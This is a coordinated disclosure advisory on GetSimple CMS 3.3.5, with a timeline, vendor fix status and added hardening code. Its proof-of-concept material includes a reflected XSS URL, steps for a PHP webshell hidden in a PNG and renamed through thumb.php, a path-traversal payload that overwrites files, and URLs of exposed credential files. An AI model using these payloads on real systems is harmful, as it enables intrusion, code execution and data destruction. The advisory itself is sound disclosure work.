XSS, Code Execution, DOS, Password Leak, Weak Authentication in GetSimpleCMS 3.3.5

2015-07-27 00:00:00
vulners.com

Vulnerability: XSS, Code Execution, DOS, Password Leak, Weak Authentication
Affected Software: GetSimpleCMS (http://get-simple.info/)
Affected Version: 3.3.5 (probably also prior versions)
Patched Version: 3.3.6 (partial fix)
Risk: Medium-High
Vendor Contacted: 2015-06-14
Vendor Partial Fix: 2015-07-14
Public Disclosure: 2015-07-15

GetSimple CMS is a content management system written in PHP. It does not
use a DBMS but stores its data in XML files instead.

There are various vulnerabilities in version 3.3.5, most of which are
fixed in version 3.3.6.

For version 3.3.6 it is important that the .htaccess file of GetSimple
CMS is read by the server, as otherwise passwords and other sensitive
information will be disclosed (the functionality of the website itself
is not affected by an unread .htaccess file, so this might go unnoticed).

Password Leak (only partially fixed)

Risk
----

Medium-High; passwords may leak, depending on server configuration

Description
-----------

A lot of sensitive information is stored in .xml files inside the
web root. The .htaccess file of GetSimpleCMS does prevent access to .xml
files, but if the .htaccess file is not used, for example because
AllowOverride None is set (e.g. for performance or security reasons),
these files become readable. There is no warning in the admin area
when this is happening.

Additionally, backups of these files may be stored with the
extension .bak, access to which is not denied by the .htaccess file.

The mentioned files can for example be found at the following locations:

http://localhost/GetSimpleCMS-3.3.5/backups/users/username.xml.bak
http://localhost/GetSimpleCMS-3.3.5/data/users/username.xml

Other xml files contain further sensitive information.

Mitigation / Comments on Vendor Fix
-----------------------------------

The vendor now also forbids access to .bak files. Other than that,
this issue was not fixed by the vendor, as it is not an issue if the
user has configured the webserver in a specific way.

Because of this, **it is extremely important that AllowOverride None
is not set**, so that the .htaccess file is actually read by the server.
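If AllowOverride None is needed anyway, the protection has to move into the server configuration, where it does not depend on .htaccess being read. The following Apache 2.4 fragment is an added example, not the project's own .htaccess; the DocumentRoot /var/www/getsimple is assumed, and the data/ and backups/ directories are taken from the URLs above.

```apache
# Constructed example: deny HTTP access to GetSimple's sensitive stores at the
# server level. /var/www/getsimple is an assumed DocumentRoot; adjust it.
<Directory "/var/www/getsimple">
    # .htaccess is ignored on purpose; the rules that matter live below,
    # so they keep working regardless of this setting.
    AllowOverride None
</Directory>

# The .xml files (users, salt, ...) and their .bak copies live under
# data/ and backups/ (per the advisory's example paths). PHP reads them
# from disk, so denying them over HTTP does not affect the site itself.
<DirectoryMatch "^/var/www/getsimple/(data|backups)/">
    <FilesMatch "\.(xml|bak)$">
        Require all denied
    </FilesMatch>
</DirectoryMatch>
```

After reloading Apache, a request for data/users/username.xml or backups/users/username.xml.bak must return 403, not 200; checking this once is the warning the admin area does not give.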

Insufficient Cookie Authentication (not fixed)

Risk
----

Medium; authentication bypass, depending on server configuration

Description
-----------

The cookie used to authenticate users does not contain truly random
data, and never changes. It does contain:

 - $USR (user name)
 - $SALT (per default a value stored in
   localhost/GetSimpleCMS-3.3.5/data/other/authorization.xml, see above)
 - $cookie_name (contains the site name and the site version, none of
   which should be sensitive information, and can be easily found in
   various files)

Depending on server configuration, it is relatively easy for an
attacker to retrieve all of these values, which would enable them to log
in as any user.

Insufficient CSRF Protection (not fixed)

Risk
----

Low-Medium; CSRF protection can be bypassed, depending on server
configuration

Description
-----------

The CSRF nonce does not contain truly random data and may thus be
guessed by an attacker. It does contain:

 - $action (known to attacker)
 - $file (known to attacker)
 - $SALT (site salt, see above)
 - $uid (user agent)
 - $time (two hour window)
 - $USR (user name)

$time is not a problem. If an attacker wants to, they can automatically
update it in their attack code.
This leaves the user agent. There are a lot of lists of the most
common user agents available, and they cover a high percentage of the
user agents in use, so this value can also relatively easily be guessed
by an attacker.
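Both the cookie and the CSRF nonce share one design flaw: every input is something an attacker can obtain or guess, so the value is reproducible. The following Python is an added example, not GetSimple code: it models the nonce from the inputs listed above (how 3.3.5 actually concatenates and hashes them is not stated here, so that part is an assumption) and contrasts it with a nonce keyed by a per-session random secret; the same principle gives a random session identifier instead of a cookie derived from $USR, $SALT and $cookie_name.

```python
import hashlib
import hmac
import secrets

# Added example, not GetSimple code.

def legacy_style_nonce(action, file, salt, uid, usr, now):
    # Models the 3.3.5 inputs listed in the advisory. The concatenation and
    # sha1 below are an assumption for illustration; the point is only that
    # every input is known or guessable, so anyone can recompute the value.
    window = now // 7200          # $time: two-hour window
    material = f"{action}{file}{salt}{uid}{window}{usr}".encode()
    return hashlib.sha1(material).hexdigest()

def new_session_secret():
    # 32 bytes from the OS CSPRNG, kept server-side with the session and
    # never sent to the client, so there is nothing to retrieve or guess.
    return secrets.token_bytes(32)

def keyed_nonce(session_secret, action, file):
    # Still bound to action and file (not valid for other requests), but
    # only computable by a holder of the secret.
    msg = f"{action}\0{file}".encode()
    return hmac.new(session_secret, msg, "sha256").hexdigest()

def check_nonce(session_secret, action, file, presented):
    # Constant-time comparison of the expected and presented nonces.
    expected = keyed_nonce(session_secret, action, file)
    return hmac.compare_digest(expected, presented)

def keyed_nonce_properties():
    # True when two sessions give different nonces for the same request, a
    # nonce verifies for its own session and request, and fails otherwise.
    s1, s2 = new_session_secret(), new_session_secret()
    n1 = keyed_nonce(s1, "edit", "index.php")
    return (n1 != keyed_nonce(s2, "edit", "index.php")
            and check_nonce(s1, "edit", "index.php", n1)
            and not check_nonce(s1, "edit", "other.php", n1)
            and not check_nonce(s2, "edit", "index.php", n1))
```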

Reflected XSS

Risk
----

Medium; arbitrary JavaScript execution, which can lead to CSRF
protection bypass, which in this case leads to arbitrary code execution
via e.g. the theme editor

POC
---

http://localhost/GetSimpleCMS-3.3.5/admin/filebrowser.php?returnid=foobar&func=foobar %3D%3D 'function') {}}}alert(1); </script>

Code Execution (Admin)

Risk
----

Medium; an admin can execute arbitrary PHP code without using the
designated theme editor (this is bad because some users might disable
the theme editor for security reasons)

POC
---

1. A valid image file with PHP code inside is needed (can e.g. be
   created by creating a 1x1 png via gimp, and editing "created by gimp" in
   vim to be <?php passthru($_GET['c']); ?>)
2. Upload the image
3. Rename the file extension:
   http://localhost/GetSimpleCMS-3.3.5/admin/inc/thumb.php?src=evil.png&dest=evil.php
4. Visit the PHP shell:
   http://localhost/GetSimpleCMS-3.3.5/data/thumbs/evil.php?c=id

DOS (via CSRF)

Risk
----

Medium; relevant system files can be destroyed by an admin, or by an
attacker if an admin visits their website

Description
-----------

Any file on the system that the web user has access to can be
overwritten with an image file that already exists on the server.
Credentials are required, but the request is not protected by CSRF
protection.

POC
---

http://localhost/GetSimpleCMS-3.3.5/admin/inc/thumb.php?src=evil.png&dest=.../...//.../...//.../...//.../...//.../...//var/www/important
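Both thumb.php POCs (the evil.png to evil.php rename above and this traversal) come down to the dest parameter being trusted. The Python below is an added example, not GetSimple code: it assumes the ".../...//" segments are there to survive a filter that removes "../" in a single pass (each segment collapses to "../" afterwards), and shows a destination check that does not sanitize at all but canonicalizes the path, checks containment in an assumed thumbs directory, and allow-lists the extension.

```python
import os

# Added example, not GetSimple code. THUMBS_DIR is an assumed location.
THUMBS_DIR = "/var/www/getsimple/data/thumbs"
ALLOWED_EXT = {".png", ".jpg", ".jpeg", ".gif"}

# dest value from the advisory's thumb.php DOS POC
TRAVERSAL_DEST = ".../...//" * 5 + "var/www/important"

def naive_strip(dest):
    # The kind of sanitizer the payload is shaped for: one pass of removing
    # "../". Each ".../...//" loses two "../" and what remains is "../".
    return dest.replace("../", "")

def safe_thumb_path(dest, base_dir=THUMBS_DIR):
    # Canonicalize base and target; realpath collapses ".." and resolves
    # symlinks, so no string filtering is involved.
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, dest))
    # Containment: target must lie strictly below the thumbs directory.
    if target == base or os.path.commonpath([base, target]) != base:
        raise ValueError(f"dest escapes {base}: {dest!r}")
    # Extension allow-list: stops the evil.png -> evil.php rename from the
    # code-execution POC regardless of what the source file was.
    if os.path.splitext(target)[1].lower() not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {dest!r}")
    return target

def is_accepted(dest, base_dir=THUMBS_DIR):
    # Boolean wrapper for callers that only need accept/reject.
    try:
        safe_thumb_path(dest, base_dir)
        return True
    except ValueError:
        return False
```

Note that the raw payload is rejected here only by the extension check: canonically it is a harmless path of "..." directories, and it becomes a traversal only after a strip-style filter rewrites it.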

Code Execution (Admin, not with default config)

Risk
----

Minimal; requires admin credentials and custom configuration

Description
-----------

The function that validates file types can work with a blacklist
(default) or a whitelist.

The function works fine with the default configuration. But if a user
were to use the whitelist approach, it would introduce a vulnerability,
as the validation then relies only on the given MIME type, which is
entirely user controlled.

Directory Traversal

Risk
----

Minimal; it is possible to go up one directory when viewing files

POC
---

localhost/GetSimpleCMS-3.3.5/admin/theme-edit.php?t=..&f=gsconfig.php&s=Edit

Timeline

2015-06-14: Requesting Contact Email via official forum
2015-06-15: Vendor Reply
2015-06-15: Advisory Sent
2015-06-16: Vendor Confirmation, Issues opened
2015-06-22: Vendor Released Partial Fix as Beta Version
2015-07-13: Disclosure Announced
2015-07-13: Vendor Confirmation
2015-07-14: Vendor Releases Partial Fix
2015-07-15: Disclosure

Source

http://software-talk.org/blog/2015/07/getsimplecms-3-3-5-xss-code-execution-dos-password-leak-weak-authentication-misc/